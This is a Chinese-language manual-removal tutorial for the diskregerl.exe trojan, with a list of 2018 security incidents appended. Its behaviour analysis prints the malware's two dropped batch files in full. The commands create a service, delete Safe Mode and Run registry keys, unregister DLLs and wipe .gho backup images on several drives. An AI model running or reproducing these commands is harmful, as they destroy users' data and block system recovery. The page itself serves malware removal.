diskregerl.exe病毒手動(dòng)查殺教程
電腦病毒看不見,卻無處不在,有時(shí)防護(hù)措施不夠或者不當(dāng)操作都會(huì)導(dǎo)致病毒入侵。有用戶遇到diskregerl.exe(Trojan.Agent.cdt)病毒,那么具體怎么查殺呢?
方法步驟
文件名稱:diskregerl.exe 文件大?。?5,056 字節(jié) AV命名:Trojan.Agent.cdt 加殼方式:UPX 編寫語言:VC
文件MD5:e98a4571cf72b798077d12d6c4894629
行為分析:
1、拷貝文件:
C:\windows\system32\diskregerl.exe 45,056 字節(jié)
2、無添加啟動(dòng)項(xiàng)舉動(dòng)。
3、釋放2個(gè)批處理:
內(nèi)容分別為:
22483
17213
25187
6133
22690
25373
date 2004-08-17
19477
time 20:00:00
ping 127.0.0.1 -n 5
sc.exe create diskregerl BinPath= "C:\windows\system32\diskregerl.exe -kills" type= own type= interact start= auto DisplayName= diskregerl Programnot
sc.exe description diskregerl 創(chuàng)建網(wǎng)絡(luò)連接2
regsvr32.exe /u /s scrrun.dll
regsvr32.exe /u /s shimgvw.dll
regsvr32.exe /u /s itss.dll
regsvr32.exe /u /s vbscript.dll
regsvr32.exe /s jscript.dll
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
23413
sc.exe start diskregerl
del "C:\WINDOWS\Media\Windows XP 開始.wav"
del "C:\WINDOWS\Media\Windows XP 信息欄.wav"
del "C:\WINDOWS\Media\Windows XP 彈出窗口已阻止.wav"
regsvr32.exe /s C:\windows\system32\Programnot.dll
ping 127.0.0.1 -n 6
del "C:\Documents and Settings\孤獨(dú)更可靠\桌面\oky.exe" /F
22483
17213
date 2008-04-02
time 08:21:33
del %0
exit
第二個(gè):
25187
6133
226902537319477
2819720092
404
ping 127.0.0.1 -n 16
13539
cmd.exe /c del /f /s /q c:*.gho
6752
cmd.exe /c del /f /s /q d:*.gho
31772
cmd.exe /c del /f /s /q e:*.gho
12028
cmd.exe /c del /f /s /q f:*.gho
8720
cmd.exe /c del /f /s /q g:*.gho
10731
cmd.exe /c del /f /s /q h:*.gho
8840
cmd.exe /c del /f /s /q i:*.gho
11736
regsvr32.exe /s C:\windows\system32\Programnot.dll
del %0
exit
4、連接網(wǎng)站,刷流量:
5、另外該病毒可能惡意鎖定IE主頁,不過未實(shí)現(xiàn)。
解決方法:
1、重啟計(jì)算機(jī)。
2、刪除文件:
C:\windows\system32\diskregerl.exe
3、如果重啟后病毒無法刪除,請下載冰刃(該軟件可到down.45it.com下載),結(jié)束其進(jìn)程。
相關(guān)閱讀:2018網(wǎng)絡(luò)安全事件:
一、英特爾處理器曝“Meltdown”和“Spectre漏洞”
2018年1月,英特爾處理器中曝“Meltdown”(熔斷)和“Spectre” (幽靈)兩大新型漏洞,包括AMD、ARM、英特爾系統(tǒng)和處理器在內(nèi),幾乎近20年發(fā)售的所有設(shè)備都受到影響,受影響的設(shè)備包括手機(jī)、電腦、服務(wù)器以及云計(jì)算產(chǎn)品。這些漏洞允許惡意程序從其它程序的內(nèi)存空間中竊取信息,這意味著包括密碼、帳戶信息、加密密鑰乃至其它一切在理論上可存儲(chǔ)于內(nèi)存中的信息均可能因此外泄。
二、GitHub 遭遇大規(guī)模 Memcached DDoS 攻擊
2018年2月,知名代碼托管網(wǎng)站 GitHub 遭遇史上大規(guī)模 Memcached DDoS 攻擊,流量峰值高達(dá)1.35 Tbps。然而,事情才過去五天,DDoS攻擊再次刷新紀(jì)錄,美國一家服務(wù)提供商遭遇DDoS 攻擊的峰值創(chuàng)新高,達(dá)到1.7 Tbps!攻擊者利用暴露在網(wǎng)上的 Memcached 服務(wù)器進(jìn)行攻擊。網(wǎng)絡(luò)安全公司 Cloudflare 的研究人員發(fā)現(xiàn),截止2018年2月底,中國有2.5萬 Memcached 服務(wù)器暴露在網(wǎng)上 。
三、蘋果 iOS iBoot源碼泄露
2018年2月,開源代碼分享網(wǎng)站 GitHub(軟件項(xiàng)目托管平臺(tái))上有人共享了 iPhone 操作系統(tǒng)的核心組件源碼,泄露的代碼屬于 iOS 安全系統(tǒng)的重要組成部分——iBoot。iBoot 相當(dāng)于是 Windows 電腦的 BIOS 系統(tǒng)。此次 iBoot 源碼泄露可能讓數(shù)以億計(jì)的 iOS 設(shè)備面臨安全威脅。iOS 與 MacOS 系統(tǒng)開發(fā)者 Jonathan Levin 表示,這是 iOS 歷史上最嚴(yán)重的一次泄漏事件。
四、韓國平昌冬季奧運(yùn)會(huì)遭遇黑客攻擊
2018年2月,韓國平昌冬季奧運(yùn)會(huì)開幕式當(dāng)天遭遇黑客攻擊,此次攻擊造成網(wǎng)絡(luò)中斷,廣播系統(tǒng)(觀眾不能正常觀看直播)和奧運(yùn)會(huì)官網(wǎng)均無法正常運(yùn)作,許多觀眾無法打印開幕式門票,最終未能正常入場。
五、加密貨幣采礦軟件攻擊致歐洲廢水處理設(shè)施癱瘓
2018年2月中旬,工業(yè)網(wǎng)絡(luò)安全企業(yè) Radiflow 公司表示,發(fā)現(xiàn)四臺(tái)接入歐洲廢水處理設(shè)施運(yùn)營技術(shù)網(wǎng)絡(luò)的服務(wù)器遭遇加密貨幣采礦惡意軟件的入侵。該惡意軟件直接拖垮了廢水處理設(shè)備中的 HMI 服務(wù)器 CPU,致歐洲廢水處理服務(wù)器癱瘓 。
Radiflow 公司稱,此次事故是加密貨幣惡意軟件首次對(duì)關(guān)鍵基礎(chǔ)設(shè)施運(yùn)營商的運(yùn)營技術(shù)網(wǎng)絡(luò)展開攻擊。由于受感染的服務(wù)器為人機(jī)交互(簡稱HMI)設(shè)備,之所以導(dǎo)致廢水處理系統(tǒng)癱瘓,是因?yàn)檫@種惡意軟件會(huì)嚴(yán)重降低 HMI 的運(yùn)行速度。
病毒手動(dòng)查殺教程相關(guān)文章: